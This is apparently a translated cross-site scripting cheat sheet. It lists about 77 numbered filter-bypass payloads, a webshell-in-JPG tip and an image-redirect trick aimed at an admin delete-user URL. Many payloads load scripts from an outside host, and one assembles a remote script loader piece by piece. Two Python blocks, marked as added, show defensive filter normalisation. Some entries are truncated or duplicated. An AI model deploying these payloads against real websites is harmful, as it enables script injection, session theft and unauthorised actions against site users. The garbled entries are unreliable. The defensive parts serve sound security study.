Cross-site image shell
XSS cross-site code: <script>alert("")</script>

Put this code on the first line of the webshell, then save the webshell in JPG image format; when the image-format webshell is requested, our webshell is executed as well.

(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript directive
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding, without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting up the word javascript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the word javascript
<IMG SRC="jav&#x09;ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav&#x0A;ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav&#x0D;ascript:alert('XSS');">

(15) Multi-line injected JavaScript; an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around character limits (all pieces must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2 (null bytes are basically useless in China, since there is nowhere they can be exploited)
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">

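Entries (3) to (19) all target the same weak check: a filter that looks for the literal string javascript:. As an added defensive example, not part of the original post, the Python below normalises an attribute value the way a browser does (decodes character references, drops control bytes and padding, case-folds) before reading its scheme, and runs both the naive check and the normalised one over constructed samples; the sample values and function names are mine, not from the post.

```python
import html
import re

# URL schemes that hand the value to a script engine; both occur in the list above.
SCRIPT_SCHEMES = {"javascript", "vbscript"}

# Browsers ignore ASCII control bytes (NUL, tab, CR, LF ...) inside a URL and
# spaces around it before reading the scheme, so the filter must do the same.
_CONTROLS = re.compile(r"[\x00-\x1f\x7f]")
_SCHEME = re.compile(r"^([a-z][a-z0-9+.\-]*):", re.IGNORECASE)


def naive_filter(value: str) -> bool:
    """The literal substring check the entries above are written to slip past."""
    return "javascript:" in value


def normalize(value: str) -> str:
    """Undo the encodings the list relies on before looking at the scheme."""
    for _ in range(3):                  # unwind double-encoded references
        decoded = html.unescape(value)  # &#x09; &#106; &#0000106 ...
        if decoded == value:
            break
        value = decoded
    value = _CONTROLS.sub("", value)    # java\0script, jav<TAB>ascript
    return value.strip()                # " javascript:" with leading spaces


def scheme_of(value: str) -> str:
    """Lower-cased scheme of an attribute value after normalisation, or ""."""
    match = _SCHEME.match(normalize(value))
    return match.group(1).lower() if match else ""


def has_script_scheme(value: str) -> bool:
    """Robust replacement for naive_filter(): flags every variant above."""
    return scheme_of(value) in SCRIPT_SCHEMES


# Constructed attribute values (not captured traffic) mirroring entries (4), (5),
# (12), (17), (19) and (40), plus two benign URLs, one of which the naive check
# wrongly flags.
SAMPLES = {
    "JaVaScRiPt:alert('XSS')": True,
    "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')": True,
    "jav&#x09;ascript:alert('XSS');": True,
    "java\x00script:alert(\"XSS\")": True,
    " javascript:alert('XSS');": True,
    "vbscript:msgbox(\"XSS\")": True,
    "http://3w.org/XSS/xss.js": False,
    "https://example.com/?next=javascript:x": False,   # naive check flags this
}


def check_samples() -> dict:
    """Map each sample to (expected, naive_filter result, has_script_scheme result)."""
    return {v: (want, naive_filter(v), has_script_scheme(v)) for v, want in SAMPLES.items()}
```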
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extra opening brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META with a URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters prepended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url( javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a broken-up expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (anything that starts with an open angle bracket and a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE approach
expression(alert("XSS"))'>

(53) STYLE background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash movie that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

(56) Using ActionScript inside the Flash movie, you can mix in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace (the .HTC file must be on the same server as your XSS vector)
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command (can execute arbitrary commands)
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing character filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP in decimal
<A HREF="http://3232235521">XSS</A>

(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute dot (absolute DNS name)
<A HREF="http://www.google.com./">XSS</A>

(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
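Entries (70) to (76) show that one host can be written many ways, which defeats any link allowlist that compares raw URL strings. As an added defensive example, not part of the original post, the Python below canonicalises the host (legacy decimal, hexadecimal, octal and mixed IPv4 literals to dotted decimal, trailing dot removed, protocol-relative links accepted) before the allowlist comparison; the function names and the allowlist are mine. The scheme still has to be checked separately, since the javascript: link in (77) has no host at all.

```python
import re
from urllib.parse import urlsplit

# One dotted component of a legacy IPv4 literal: hex (0x..), octal (leading 0)
# or decimal, as in entries (70) to (73).
_PART = re.compile(r"^(0[xX][0-9a-fA-F]*|0[0-7]*|[1-9][0-9]*)$")


def _part_value(part: str) -> int:
    if not _PART.match(part):
        raise ValueError(part)
    if part[:2].lower() == "0x":
        return int(part[2:] or "0", 16)
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)
    return int(part, 10)


def legacy_ipv4(host: str):
    """Dotted-decimal form of a 1-4 part IPv4 literal, or None if host is not one."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        nums = [_part_value(p) for p in parts]
    except ValueError:
        return None
    *head, last = nums
    # Leading parts are one byte each; the last part fills the remaining bytes,
    # so "3232235521" is all four bytes and "0x7.147" means 7.0.0.147.
    if any(n > 255 for n in head) or last >= 256 ** (5 - len(nums)):
        return None
    value = 0
    for n in head:
        value = value * 256 + n
    value = value * 256 ** (5 - len(nums)) + last
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def canonical_host(url: str) -> str:
    """Host the link really points at, in one spelling ("" if it has none)."""
    host = (urlsplit(url.strip()).hostname or "").rstrip(".")  # (76): trailing dot
    return legacy_ipv4(host) or host                           # (70)-(73): numeric forms


def link_allowed(url: str, allowed_hosts) -> bool:
    """Allowlist check that compares canonical hosts, not raw URL strings."""
    return canonical_host(url) in allowed_hosts


# Constructed allowlist for the demonstration, not from the post.
ALLOWED = {"www.google.com", "192.168.0.1"}
```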